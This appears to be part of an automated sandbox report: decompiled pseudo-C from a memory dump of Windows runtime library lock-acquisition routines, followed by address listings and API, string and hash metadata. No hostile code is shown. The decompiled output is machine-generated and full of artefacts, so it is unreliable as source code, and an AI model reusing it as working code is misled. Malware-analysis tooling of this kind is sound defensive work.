                                                                                                                                                                                                              							__eflags = _t115;
                                                                                                                                                                                                              							if(_t115 < 0) {
                                                                                                                                                                                                              								L23:
                                                                                                                                                                                                              								_t130 = 0;
                                                                                                                                                                                                              								__eflags = 0;
                                                                                                                                                                                                              								while(1) {
                                                                                                                                                                                                              									_t118 =  *(_t96 + 0x30) & 0x00000001;
                                                                                                                                                                                                              									asm("sbb esi, esi");
                                                                                                                                                                                                              									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00cc01c0;
                                                                                                                                                                                                              									_push(_t144);
                                                                                                                                                                                                              									_push(0);
                                                                                                                                                                                                              									_t51 = E00BDF8CC( *((intOrPtr*)(_t96 + 0x18)));
                                                                                                                                                                                                              									__eflags = _t51 - 0x102;
                                                                                                                                                                                                              									if(_t51 != 0x102) {
                                                                                                                                                                                                              										break;
                                                                                                                                                                                                              									}
                                                                                                                                                                                                              									_t106 =  *(_t144 + 4);
                                                                                                                                                                                                              									_t126 =  *_t144;
                                                                                                                                                                                                              									_t86 = E00C24FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
                                                                                                                                                                                                              									_push(_t126);
                                                                                                                                                                                                              									_push(_t86);
                                                                                                                                                                                                              									E00C33F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
                                                                                                                                                                                                              									E00C33F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                                                                                                                                                                              									_t130 = _t130 + 1;
                                                                                                                                                                                                              									_t160 = _t158 + 0x28;
                                                                                                                                                                                                              									__eflags = _t130 - 2;
                                                                                                                                                                                                              									if(__eflags > 0) {
                                                                                                                                                                                                              										E00C6217A(_t106, __eflags, _t96);
                                                                                                                                                                                                              									}
                                                                                                                                                                                                              									_push("RTL: Re-Waiting\n");
                                                                                                                                                                                                              									_push(0);
                                                                                                                                                                                                              									_push(0x65);
                                                                                                                                                                                                              									E00C33F92();
                                                                                                                                                                                                              									_t158 = _t160 + 0xc;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								__eflags = _t51;
                                                                                                                                                                                                              								if(__eflags < 0) {
                                                                                                                                                                                                              									_push(_t51);
                                                                                                                                                                                                              									E00C23915(_t96, _t106, _t118, _t130, _t144, __eflags);
                                                                                                                                                                                                              									asm("int3");
                                                                                                                                                                                                              									while(1) {
                                                                                                                                                                                                              										L32:
                                                                                                                                                                                                              										__eflags = _a8;
                                                                                                                                                                                                              										if(_a8 == 0) {
                                                                                                                                                                                                              											break;
                                                                                                                                                                                                              										}
                                                                                                                                                                                                              										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                                                                                                                                                                              										_t119 = _t96 + 0x24;
                                                                                                                                                                                                              										_t107 = 1;
                                                                                                                                                                                                              										asm("lock xadd [eax], ecx");
                                                                                                                                                                                                              										_t56 =  *(_t96 + 0x28);
                                                                                                                                                                                                              										_a4 = _t56;
                                                                                                                                                                                                              										__eflags = _t56;
                                                                                                                                                                                                              										if(_t56 != 0) {
                                                                                                                                                                                                              											L40:
                                                                                                                                                                                                              											_t128 = 0;
                                                                                                                                                                                                              											__eflags = 0;
                                                                                                                                                                                                              											while(1) {
                                                                                                                                                                                                              												_t121 =  *(_t96 + 0x30) & 0x00000001;
                                                                                                                                                                                                              												asm("sbb esi, esi");
                                                                                                                                                                                                              												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00cc01c0;
                                                                                                                                                                                                              												_push(_t138);
                                                                                                                                                                                                              												_push(0);
                                                                                                                                                                                                              												_t58 = E00BDF8CC( *((intOrPtr*)(_t96 + 0x20)));
                                                                                                                                                                                                              												__eflags = _t58 - 0x102;
                                                                                                                                                                                                              												if(_t58 != 0x102) {
                                                                                                                                                                                                              													break;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												_t107 =  *(_t138 + 4);
                                                                                                                                                                                                              												_t125 =  *_t138;
                                                                                                                                                                                                              												_t75 = E00C24FC0(_t125, _t107, 0xff676980, 0xffffffff);
                                                                                                                                                                                                              												_push(_t125);
                                                                                                                                                                                                              												_push(_t75);
                                                                                                                                                                                                              												E00C33F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
                                                                                                                                                                                                              												E00C33F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                                                                                                                                                                              												_t128 = _t128 + 1;
                                                                                                                                                                                                              												_t159 = _t158 + 0x28;
                                                                                                                                                                                                              												__eflags = _t128 - 2;
                                                                                                                                                                                                              												if(__eflags > 0) {
                                                                                                                                                                                                              													E00C6217A(_t107, __eflags, _t96);
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												_push("RTL: Re-Waiting\n");
                                                                                                                                                                                                              												_push(0);
                                                                                                                                                                                                              												_push(0x65);
                                                                                                                                                                                                              												E00C33F92();
                                                                                                                                                                                                              												_t158 = _t159 + 0xc;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											__eflags = _t58;
                                                                                                                                                                                                              											if(__eflags < 0) {
                                                                                                                                                                                                              												_push(_t58);
                                                                                                                                                                                                              												E00C23915(_t96, _t107, _t121, _t128, _t138, __eflags);
                                                                                                                                                                                                              												asm("int3");
                                                                                                                                                                                                              												_t61 =  *_t107;
                                                                                                                                                                                                              												 *_t107 = 0;
                                                                                                                                                                                                              												__eflags = _t61;
                                                                                                                                                                                                              												if(_t61 == 0) {
                                                                                                                                                                                                              													L1:
                                                                                                                                                                                                              													_t63 = E00C05384(_t138 + 0x24);
                                                                                                                                                                                                              													if(_t63 != 0) {
                                                                                                                                                                                                              														goto L52;
                                                                                                                                                                                                              													} else {
                                                                                                                                                                                                              														goto L2;
                                                                                                                                                                                                              													}
                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                              													_t123 =  *((intOrPtr*)(_t138 + 0x18));
                                                                                                                                                                                                              													_push( &_a4);
                                                                                                                                                                                                              													_push(_t61);
                                                                                                                                                                                                              													_t70 = E00BDF970( *((intOrPtr*)(_t138 + 0x18)));
                                                                                                                                                                                                              													__eflags = _t70;
                                                                                                                                                                                                              													if(__eflags >= 0) {
                                                                                                                                                                                                              														goto L1;
                                                                                                                                                                                                              													} else {
                                                                                                                                                                                                              														_push(_t70);
                                                                                                                                                                                                              														E00C23915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
                                                                                                                                                                                                              														L52:
                                                                                                                                                                                                              														_t122 =  *((intOrPtr*)(_t138 + 0x20));
                                                                                                                                                                                                              														_push( &_a4);
                                                                                                                                                                                                              														_push(1);
                                                                                                                                                                                                              														_t63 = E00BDF970( *((intOrPtr*)(_t138 + 0x20)));
                                                                                                                                                                                                              														__eflags = _t63;
                                                                                                                                                                                                              														if(__eflags >= 0) {
                                                                                                                                                                                                              															L2:
                                                                                                                                                                                                              															return _t63;
                                                                                                                                                                                                              														} else {
                                                                                                                                                                                                              															_push(_t63);
                                                                                                                                                                                                              															E00C23915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
                                                                                                                                                                                                              															_t109 =  *((intOrPtr*)(_t138 + 0x20));
                                                                                                                                                                                                              															_push( &_a4);
                                                                                                                                                                                                              															_push(1);
                                                                                                                                                                                                              															_t63 = E00BDF970( *((intOrPtr*)(_t138 + 0x20)));
                                                                                                                                                                                                              															__eflags = _t63;
                                                                                                                                                                                                              															if(__eflags >= 0) {
                                                                                                                                                                                                              																goto L2;
                                                                                                                                                                                                              															} else {
                                                                                                                                                                                                              																_push(_t63);
                                                                                                                                                                                                              																_t66 = E00C23915(_t96, _t109, _t122, _t128, _t138, __eflags);
                                                                                                                                                                                                              																asm("int3");
                                                                                                                                                                                                              																while(1) {
                                                                                                                                                                                                              																	_t110 = _t66;
                                                                                                                                                                                                              																	__eflags = _t66 - 1;
                                                                                                                                                                                                              																	if(_t66 != 1) {
                                                                                                                                                                                                              																		break;
                                                                                                                                                                                                              																	}
                                                                                                                                                                                                              																	_t128 = _t128 | 0xffffffff;
                                                                                                                                                                                                              																	_t66 = _t110;
                                                                                                                                                                                                              																	asm("lock cmpxchg [ebx], edi");
                                                                                                                                                                                                              																	__eflags = _t66 - _t110;
                                                                                                                                                                                                              																	if(_t66 != _t110) {
                                                                                                                                                                                                              																		continue;
                                                                                                                                                                                                              																	} else {
                                                                                                                                                                                                              																		_t67 =  *[fs:0x18];
                                                                                                                                                                                                              																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
                                                                                                                                                                                                              																		return _t67;
                                                                                                                                                                                                              																	}
                                                                                                                                                                                                              																	goto L59;
                                                                                                                                                                                                              																}
                                                                                                                                                                                                              																E00C05329(_t110, _t138);
                                                                                                                                                                                                              																_t69 = E00C053A5(_t138, 1);
                                                                                                                                                                                                              																return _t69;
                                                                                                                                                                                                              															}
                                                                                                                                                                                                              														}
                                                                                                                                                                                                              													}
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                              												_t56 =  *(_t96 + 0x28);
                                                                                                                                                                                                              												goto L3;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              										} else {
                                                                                                                                                                                                              											_t107 =  *_t119;
                                                                                                                                                                                                              											__eflags = _t107;
                                                                                                                                                                                                              											if(__eflags > 0) {
                                                                                                                                                                                                              												while(1) {
                                                                                                                                                                                                              													_t81 = _t107;
                                                                                                                                                                                                              													asm("lock cmpxchg [edi], esi");
                                                                                                                                                                                                              													__eflags = _t81 - _t107;
                                                                                                                                                                                                              													if(_t81 == _t107) {
                                                                                                                                                                                                              														break;
                                                                                                                                                                                                              													}
                                                                                                                                                                                                              													_t107 = _t81;
                                                                                                                                                                                                              													__eflags = _t81;
                                                                                                                                                                                                              													if(_t81 > 0) {
                                                                                                                                                                                                              														continue;
                                                                                                                                                                                                              													}
                                                                                                                                                                                                              													break;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												_t56 = _a4;
                                                                                                                                                                                                              												__eflags = _t107;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											if(__eflags != 0) {
                                                                                                                                                                                                              												while(1) {
                                                                                                                                                                                                              													L3:
                                                                                                                                                                                                              													__eflags = _t56;
                                                                                                                                                                                                              													if(_t56 != 0) {
                                                                                                                                                                                                              														goto L32;
                                                                                                                                                                                                              													}
                                                                                                                                                                                                              													_t107 = _t107 | 0xffffffff;
                                                                                                                                                                                                              													_t56 = 0;
                                                                                                                                                                                                              													asm("lock cmpxchg [edx], ecx");
                                                                                                                                                                                                              													__eflags = 0;
                                                                                                                                                                                                              													if(0 != 0) {
                                                                                                                                                                                                              														continue;
                                                                                                                                                                                                              													} else {
                                                                                                                                                                                                              														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                                                                                                                                                              														return 1;
                                                                                                                                                                                                              													}
                                                                                                                                                                                                              													goto L59;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												continue;
                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                              												goto L40;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              										}
                                                                                                                                                                                                              										goto L59;
                                                                                                                                                                                                              									}
                                                                                                                                                                                                              									__eflags = 0;
                                                                                                                                                                                                              									return 0;
                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                              									_t115 =  *(_t96 + 0x28);
                                                                                                                                                                                                              									continue;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								_t106 =  *_t49;
                                                                                                                                                                                                              								__eflags = _t106;
                                                                                                                                                                                                              								if(__eflags > 0) {
                                                                                                                                                                                                              									while(1) {
                                                                                                                                                                                                              										_t93 = _t106;
                                                                                                                                                                                                              										asm("lock cmpxchg [edi], esi");
                                                                                                                                                                                                              										__eflags = _t93 - _t106;
                                                                                                                                                                                                              										if(_t93 == _t106) {
                                                                                                                                                                                                              											break;
                                                                                                                                                                                                              										}
                                                                                                                                                                                                              										_t106 = _t93;
                                                                                                                                                                                                              										__eflags = _t93;
                                                                                                                                                                                                              										if(_t93 > 0) {
                                                                                                                                                                                                              											continue;
                                                                                                                                                                                                              										}
                                                                                                                                                                                                              										break;
                                                                                                                                                                                                              									}
                                                                                                                                                                                                              									__eflags = _t106;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								if(__eflags != 0) {
                                                                                                                                                                                                              									continue;
                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                              									goto L23;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						goto L59;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					_t84 = _t115;
                                                                                                                                                                                                              					asm("lock cmpxchg [esi], ecx");
                                                                                                                                                                                                              					__eflags = _t84 - _t115;
                                                                                                                                                                                                              					if(_t84 != _t115) {
                                                                                                                                                                                                              						_t115 = _t84;
                                                                                                                                                                                                              						goto L7;
                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                              						return 1;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				L59:
                                                                                                                                                                                                              			}




































                                                                                                                                                                                                              0x00c2055a
                                                                                                                                                                                                              0x00c2055d
                                                                                                                                                                                                              0x00c20563
                                                                                                                                                                                                              0x00c20566
                                                                                                                                                                                                              0x00c205d8
                                                                                                                                                                                                              0x00c205e2
                                                                                                                                                                                                              0x00c205e5
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c205e7
                                                                                                                                                                                                              0x00c205e7
                                                                                                                                                                                                              0x00c205ea
                                                                                                                                                                                                              0x00c205f3
                                                                                                                                                                                                              0x00c205f3
                                                                                                                                                                                                              0x00c20568
                                                                                                                                                                                                              0x00c20568
                                                                                                                                                                                                              0x00c20568
                                                                                                                                                                                                              0x00c20569
                                                                                                                                                                                                              0x00c20569
                                                                                                                                                                                                              0x00c20569
                                                                                                                                                                                                              0x00c2056b
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c4217f
                                                                                                                                                                                                              0x00c42183
                                                                                                                                                                                                              0x00c4225b
                                                                                                                                                                                                              0x00c4225f
                                                                                                                                                                                                              0x00c42189
                                                                                                                                                                                                              0x00c4218c
                                                                                                                                                                                                              0x00c4218f
                                                                                                                                                                                                              0x00c42194
                                                                                                                                                                                                              0x00c42199
                                                                                                                                                                                                              0x00c4219d
                                                                                                                                                                                                              0x00c421a0
                                                                                                                                                                                                              0x00c421a2
                                                                                                                                                                                                              0x00c421ce
                                                                                                                                                                                                              0x00c421ce
                                                                                                                                                                                                              0x00c421ce
                                                                                                                                                                                                              0x00c421d0
                                                                                                                                                                                                              0x00c421d6
                                                                                                                                                                                                              0x00c421de
                                                                                                                                                                                                              0x00c421e2
                                                                                                                                                                                                              0x00c421e8
                                                                                                                                                                                                              0x00c421e9
                                                                                                                                                                                                              0x00c421ec
                                                                                                                                                                                                              0x00c421f1
                                                                                                                                                                                                              0x00c421f6
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c421f8
                                                                                                                                                                                                              0x00c421fb
                                                                                                                                                                                                              0x00c42206
                                                                                                                                                                                                              0x00c4220b
                                                                                                                                                                                                              0x00c4220c
                                                                                                                                                                                                              0x00c42217
                                                                                                                                                                                                              0x00c42226
                                                                                                                                                                                                              0x00c4222b
                                                                                                                                                                                                              0x00c4222c
                                                                                                                                                                                                              0x00c4222f
                                                                                                                                                                                                              0x00c42232
                                                                                                                                                                                                              0x00c42235
                                                                                                                                                                                                              0x00c42235
                                                                                                                                                                                                              0x00c4223a
                                                                                                                                                                                                              0x00c4223f
                                                                                                                                                                                                              0x00c42241
                                                                                                                                                                                                              0x00c42243
                                                                                                                                                                                                              0x00c42248
                                                                                                                                                                                                              0x00c42248
                                                                                                                                                                                                              0x00c4224d
                                                                                                                                                                                                              0x00c4224f
                                                                                                                                                                                                              0x00c42262
                                                                                                                                                                                                              0x00c42263
                                                                                                                                                                                                              0x00c42268
                                                                                                                                                                                                              0x00c42269
                                                                                                                                                                                                              0x00c42269
                                                                                                                                                                                                              0x00c42269
                                                                                                                                                                                                              0x00c4226d
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c42276
                                                                                                                                                                                                              0x00c42279
                                                                                                                                                                                                              0x00c4227e
                                                                                                                                                                                                              0x00c42283
                                                                                                                                                                                                              0x00c42287
                                                                                                                                                                                                              0x00c4228a
                                                                                                                                                                                                              0x00c4228d
                                                                                                                                                                                                              0x00c4228f
                                                                                                                                                                                                              0x00c422bc
                                                                                                                                                                                                              0x00c422bc
                                                                                                                                                                                                              0x00c422bc
                                                                                                                                                                                                              0x00c422be
                                                                                                                                                                                                              0x00c422c4
                                                                                                                                                                                                              0x00c422cc
                                                                                                                                                                                                              0x00c422d0
                                                                                                                                                                                                              0x00c422d6
                                                                                                                                                                                                              0x00c422d7
                                                                                                                                                                                                              0x00c422da
                                                                                                                                                                                                              0x00c422df
                                                                                                                                                                                                              0x00c422e4
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c422e6
                                                                                                                                                                                                              0x00c422e9
                                                                                                                                                                                                              0x00c422f4
                                                                                                                                                                                                              0x00c422f9
                                                                                                                                                                                                              0x00c422fa
                                                                                                                                                                                                              0x00c42305
                                                                                                                                                                                                              0x00c42314
                                                                                                                                                                                                              0x00c42319
                                                                                                                                                                                                              0x00c4231a
                                                                                                                                                                                                              0x00c4231d
                                                                                                                                                                                                              0x00c42320
                                                                                                                                                                                                              0x00c42323
                                                                                                                                                                                                              0x00c42323
                                                                                                                                                                                                              0x00c42328
                                                                                                                                                                                                              0x00c4232d
                                                                                                                                                                                                              0x00c4232f
                                                                                                                                                                                                              0x00c42331
                                                                                                                                                                                                              0x00c42336
                                                                                                                                                                                                              0x00c42336
                                                                                                                                                                                                              0x00c4233b
                                                                                                                                                                                                              0x00c4233d
                                                                                                                                                                                                              0x00c42350
                                                                                                                                                                                                              0x00c42351
                                                                                                                                                                                                              0x00c42356
                                                                                                                                                                                                              0x00c42359
                                                                                                                                                                                                              0x00c42359
                                                                                                                                                                                                              0x00c4235b
                                                                                                                                                                                                              0x00c4235d
                                                                                                                                                                                                              0x00c05367
                                                                                                                                                                                                              0x00c0536b
                                                                                                                                                                                                              0x00c05372
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c42363
                                                                                                                                                                                                              0x00c42363
                                                                                                                                                                                                              0x00c42369
                                                                                                                                                                                                              0x00c4236a
                                                                                                                                                                                                              0x00c4236c
                                                                                                                                                                                                              0x00c42371
                                                                                                                                                                                                              0x00c42373
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c42379
                                                                                                                                                                                                              0x00c42379
                                                                                                                                                                                                              0x00c4237a
                                                                                                                                                                                                              0x00c4237f
                                                                                                                                                                                                              0x00c4237f
                                                                                                                                                                                                              0x00c42385
                                                                                                                                                                                                              0x00c42386
                                                                                                                                                                                                              0x00c42389
                                                                                                                                                                                                              0x00c4238e
                                                                                                                                                                                                              0x00c42390
                                                                                                                                                                                                              0x00c05378
                                                                                                                                                                                                              0x00c0537c
                                                                                                                                                                                                              0x00c42396
                                                                                                                                                                                                              0x00c42396
                                                                                                                                                                                                              0x00c42397
                                                                                                                                                                                                              0x00c4239c
                                                                                                                                                                                                              0x00c423a2
                                                                                                                                                                                                              0x00c423a3
                                                                                                                                                                                                              0x00c423a6
                                                                                                                                                                                                              0x00c423ab
                                                                                                                                                                                                              0x00c423ad
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c423b3
                                                                                                                                                                                                              0x00c423b3
                                                                                                                                                                                                              0x00c423b4
                                                                                                                                                                                                              0x00c423b9
                                                                                                                                                                                                              0x00c423ba
                                                                                                                                                                                                              0x00c423ba
                                                                                                                                                                                                              0x00c423bc
                                                                                                                                                                                                              0x00c423bf
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c39153
                                                                                                                                                                                                              0x00c39158
                                                                                                                                                                                                              0x00c3915a
                                                                                                                                                                                                              0x00c3915e
                                                                                                                                                                                                              0x00c39160
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c39166
                                                                                                                                                                                                              0x00c39166
                                                                                                                                                                                                              0x00c39171
                                                                                                                                                                                                              0x00c39176
                                                                                                                                                                                                              0x00c39176
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c39160
                                                                                                                                                                                                              0x00c423c6
                                                                                                                                                                                                              0x00c423ce
                                                                                                                                                                                                              0x00c423d7
                                                                                                                                                                                                              0x00c423d7
                                                                                                                                                                                                              0x00c423ad
                                                                                                                                                                                                              0x00c42390
                                                                                                                                                                                                              0x00c42373
                                                                                                                                                                                                              0x00c4233f
                                                                                                                                                                                                              0x00c4233f
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c4233f
                                                                                                                                                                                                              0x00c42291
                                                                                                                                                                                                              0x00c42291
                                                                                                                                                                                                              0x00c42293
                                                                                                                                                                                                              0x00c42295
                                                                                                                                                                                                              0x00c4229a
                                                                                                                                                                                                              0x00c422a1
                                                                                                                                                                                                              0x00c422a3
                                                                                                                                                                                                              0x00c422a7
                                                                                                                                                                                                              0x00c422a9
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c422ab
                                                                                                                                                                                                              0x00c422ad
                                                                                                                                                                                                              0x00c422af
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c422af
                                                                                                                                                                                                              0x00c422b1
                                                                                                                                                                                                              0x00c422b4
                                                                                                                                                                                                              0x00c422b4
                                                                                                                                                                                                              0x00c422b6
                                                                                                                                                                                                              0x00c053be
                                                                                                                                                                                                              0x00c053be
                                                                                                                                                                                                              0x00c053be
                                                                                                                                                                                                              0x00c053c0
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c053cb
                                                                                                                                                                                                              0x00c053ce
                                                                                                                                                                                                              0x00c053d0
                                                                                                                                                                                                              0x00c053d4
                                                                                                                                                                                                              0x00c053d6
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c053d8
                                                                                                                                                                                                              0x00c053e3
                                                                                                                                                                                                              0x00c053ea
                                                                                                                                                                                                              0x00c053ea
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c053d6
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c422b6
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c4228f
                                                                                                                                                                                                              0x00c42349
                                                                                                                                                                                                              0x00c4234d
                                                                                                                                                                                                              0x00c42251
                                                                                                                                                                                                              0x00c42251
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c42251
                                                                                                                                                                                                              0x00c421a4
                                                                                                                                                                                                              0x00c421a4
                                                                                                                                                                                                              0x00c421a6
                                                                                                                                                                                                              0x00c421a8
                                                                                                                                                                                                              0x00c421ac
                                                                                                                                                                                                              0x00c421b6
                                                                                                                                                                                                              0x00c421b8
                                                                                                                                                                                                              0x00c421bc
                                                                                                                                                                                                              0x00c421be
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c421c0
                                                                                                                                                                                                              0x00c421c2
                                                                                                                                                                                                              0x00c421c4
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c421c4
                                                                                                                                                                                                              0x00c421c6
                                                                                                                                                                                                              0x00c421c6
                                                                                                                                                                                                              0x00c421c8
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c421c8
                                                                                                                                                                                                              0x00c421a2
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c42183
                                                                                                                                                                                                              0x00c2057b
                                                                                                                                                                                                              0x00c2057d
                                                                                                                                                                                                              0x00c20581
                                                                                                                                                                                                              0x00c20583
                                                                                                                                                                                                              0x00c42178
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c20589
                                                                                                                                                                                                              0x00c2058f
                                                                                                                                                                                                              0x00c2058f
                                                                                                                                                                                                              0x00c20583
                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C42206
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000006.00000002.2205066899.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205061481.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205153631.0000000000CB0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205158248.0000000000CC0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205163507.0000000000CC4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205168227.0000000000CC7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205172425.0000000000CD0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205201256.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                                              • API String ID: 885266447-4236105082
                                                                                                                                                                                                              • Opcode ID: 1dad41324a8019aed3e0d4b752ccecdfc5e5372a4784206c3c0ba41fe8ccd182
                                                                                                                                                                                                              • Instruction ID: 2b3cd2e761c9422833d634b0d21e288e5e138b8c2e429c05fd320a54fad254d8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1dad41324a8019aed3e0d4b752ccecdfc5e5372a4784206c3c0ba41fe8ccd182
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EB516B35B002516FEB24CE19DC82F6673A9BFD8720F214269FC55EB286DA71ED418B90
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 64%
                                                                                                                                                                                                              			E00C214C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                              				char _v10;
                                                                                                                                                                                                              				char _v140;
                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                              				signed int _t24;
                                                                                                                                                                                                              				void* _t26;
                                                                                                                                                                                                              				signed int _t29;
                                                                                                                                                                                                              				signed int _t34;
                                                                                                                                                                                                              				signed int _t40;
                                                                                                                                                                                                              				intOrPtr _t45;
                                                                                                                                                                                                              				void* _t51;
                                                                                                                                                                                                              				intOrPtr* _t52;
                                                                                                                                                                                                              				void* _t54;
                                                                                                                                                                                                              				signed int _t57;
                                                                                                                                                                                                              				void* _t58;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				_t51 = __edx;
                                                                                                                                                                                                              				_t24 =  *0xcc2088; // 0x777de364
                                                                                                                                                                                                              				_v8 = _t24 ^ _t57;
                                                                                                                                                                                                              				_t45 = _a16;
                                                                                                                                                                                                              				_t53 = _a4;
                                                                                                                                                                                                              				_t52 = _a20;
                                                                                                                                                                                                              				if(_a4 == 0 || _t52 == 0) {
                                                                                                                                                                                                              					L10:
                                                                                                                                                                                                              					_t26 = 0xc000000d;
                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                              					if(_t45 == 0) {
                                                                                                                                                                                                              						if( *_t52 == _t45) {
                                                                                                                                                                                                              							goto L3;
                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                              							goto L10;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                              						L3:
                                                                                                                                                                                                              						_t28 =  &_v140;
                                                                                                                                                                                                              						if(_a12 != 0) {
                                                                                                                                                                                                              							_push("[");
                                                                                                                                                                                                              							_push(0x41);
                                                                                                                                                                                                              							_push( &_v140);
                                                                                                                                                                                                              							_t29 = E00C17707();
                                                                                                                                                                                                              							_t58 = _t58 + 0xc;
                                                                                                                                                                                                              							_t28 = _t57 + _t29 * 2 - 0x88;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						_t54 = E00C213CB(_t53, _t28);
                                                                                                                                                                                                              						if(_a8 != 0) {
                                                                                                                                                                                                              							_t34 = E00C17707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
